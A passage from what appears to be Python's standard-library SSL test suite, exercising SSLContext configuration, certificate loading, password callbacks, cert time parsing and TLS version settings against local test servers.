with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = socket_helper.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
def test_read_write_zero(self):
# empty reads and writes now work, bpo-42854, bpo-31711
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.send(b""), 0)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.protocol, protocol)
with warnings_helper.check_warnings():
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT |
OP_IGNORE_UNEXPECTED_EOF)
self.assertEqual(default, ctx.options)
with warnings_helper.check_warnings():
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
with warnings_helper.check_warnings():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
def test_verify_mode_protocol(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@ignore_deprecation
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(
hasattr(ssl.SSLContext, 'security_level'),
"requires OpenSSL >= 1.1.0"
)
def test_security_level(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# The default security callback allows for levels between 0-5
# with OpenSSL defaulting to 1, however some vendors override the
# default value (e.g. Debian defaults to 2)
security_level_range = {
0,
1, # OpenSSL default
2, # Debian
3,
4,
5,
}
self.assertIn(ctx.security_level, security_level_range)
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
ctx.verify_flags = ssl.VERIFY_ALLOW_PROXY_CERTS
self.assertEqual(ctx.verify_flags, ssl.VERIFY_ALLOW_PROXY_CERTS)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT',
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
